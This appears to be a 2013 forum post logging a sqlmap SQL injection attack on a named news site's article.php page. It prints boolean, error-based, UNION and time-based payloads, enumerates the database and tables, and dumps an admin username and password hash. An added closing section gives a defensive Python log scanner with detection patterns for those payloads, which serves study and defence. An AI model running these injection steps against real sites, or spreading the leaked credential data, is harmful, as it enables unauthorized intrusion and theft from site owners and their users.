China Network Penetration Testing Alliance
Title: sqlmap example: injecting MySQL
Author: admin
Time: 2013-4-4 22:18
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* note: get the name of the current database user

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /* current database

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* get the table names of the current database

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+

[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" -D "wepost" -v 0 /* get the column names of the admin table

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* get the contents of the columns

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

shutting down at: 16:58:14

D:\Python27\sqlmap>
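Every step of the session above rides on the same four injection techniques that sqlmap lists in its report (boolean tautology, MySQL FLOOR(RAND(0)*2)/information_schema error-based probe, NULL-padded UNION ALL SELECT, and SLEEP()), all sent through the id parameter of article.php. The server is Apache, so these requests land in the access log. The Python below is an added, defender-side example, not part of the original post and not sqlmap code: it URL-decodes each request's query string, checks that id is a plain integer, and matches the decoded value against signatures for those four payload families. The log lines, client addresses and referer host are constructed; the rule that article.php expects an integer id (INTEGER_PARAMS) is an assumption drawn from the URL in the post, and the combined log format is assumed because the post does not show the server configuration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed Apache combined-format log lines (client addresses and the
# benign referer host are made up). The five sqlmap requests carry the
# payload families from the injection-point report above, URL-encoded as
# they travel on the wire; the last line is an ordinary visitor.
SAMPLE_LOG = """\
192.0.2.10 - - [04/Apr/2013:16:53:54 +0800] "GET /article.php?id=276 HTTP/1.1" 200 5120 "-" "sqlmap/0.9"
192.0.2.10 - - [04/Apr/2013:16:53:54 +0800] "GET /article.php?id=276%20AND%20799%3D799 HTTP/1.1" 200 5120 "-" "sqlmap/0.9"
192.0.2.10 - - [04/Apr/2013:16:53:55 +0800] "GET /article.php?id=276%20AND%20%28SELECT%208404%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%28CHAR%2858%2C99%2C118%2C120%2C58%29%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20information_schema.tables%20GROUP%20BY%20x%29a%29 HTTP/1.1" 500 312 "-" "sqlmap/0.9"
192.0.2.10 - - [04/Apr/2013:16:53:56 +0800] "GET /article.php?id=-8474%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%28CHAR%2858%2C99%2C118%2C120%2C58%29%29%2CNULL%2CNULL%2CNULL%23 HTTP/1.1" 200 5310 "-" "sqlmap/0.9"
192.0.2.10 - - [04/Apr/2013:16:53:57 +0800] "GET /article.php?id=276%20AND%20SLEEP%285%29 HTTP/1.1" 200 5120 "-" "sqlmap/0.9"
198.51.100.7 - - [04/Apr/2013:16:58:01 +0800] "GET /article.php?id=277 HTTP/1.1" 200 4990 "http://www.example.test/" "Mozilla/5.0"
"""

# Apache "combined" format: host ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# One rule per payload family in the sqlmap report, applied to the DECODED value.
SIGNATURES = [
    ("boolean-based blind", re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I)),
    ("error-based (MySQL)", re.compile(
        r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)|information_schema", re.I)),
    ("UNION query", re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
    ("time-based blind", re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I)),
    ("CHAR() obfuscation", re.compile(r"\bCHAR\s*\(\s*\d+(\s*,\s*\d+)+\s*\)", re.I)),
]

# Assumption for this example: article.php?id= takes a bare integer, so anything
# else in that parameter is worth a look even if no signature fires.
INTEGER_PARAMS = {"/article.php": {"id"}}


def analyse_line(line):
    """Return a finding dict for one log line, or None when nothing looks injected."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    url = urlsplit(m.group("target"))
    expected_ints = INTEGER_PARAMS.get(url.path, set())
    reasons = set()
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        # parse_qsl decoded once; decoding again also unwraps %25-style double encoding
        decoded = unquote_plus(value)
        if name in expected_ints and not re.fullmatch(r"-?\d+", decoded):
            reasons.add(f"non-integer value for {name!r}")
        for label, pattern in SIGNATURES:
            if pattern.search(decoded):
                reasons.add(label)
    if m.group("ua").lower().startswith("sqlmap"):
        reasons.add("sqlmap user-agent")
    if not reasons:
        return None
    return {"ip": m.group("ip"), "time": m.group("ts"), "path": url.path,
            "status": m.group("status"), "query": unquote_plus(url.query),
            "reasons": sorted(reasons)}


def scan_log(text):
    """Run analyse_line over every line of an access log and keep the findings, in order."""
    return [f for f in map(analyse_line, text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding['time']} {finding['ip']} {finding['status']} "
              f"{finding['path']} -> {', '.join(finding['reasons'])}")
        print(f"    {finding['query']}")
```

The user-agent rule is the weakest signal, since it only catches a tool left at its default string; the content rules operate on the decoded parameter value, so they fire regardless of the client. The integer check is the one worth generalising: for every endpoint whose parameters have a known shape, a value that does not fit that shape is a finding even when no signature matches. The 500 status on the error-based request and the five-second gap that SLEEP(5) produces are further signals a log-based detector can correlate. The durable fix sits in the application: bind id as an integer parameter of a prepared statement instead of concatenating it into the query.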
Welcome to China Network Penetration Testing Alliance (https://www.cobjon.com/)
Powered by Discuz! X3.2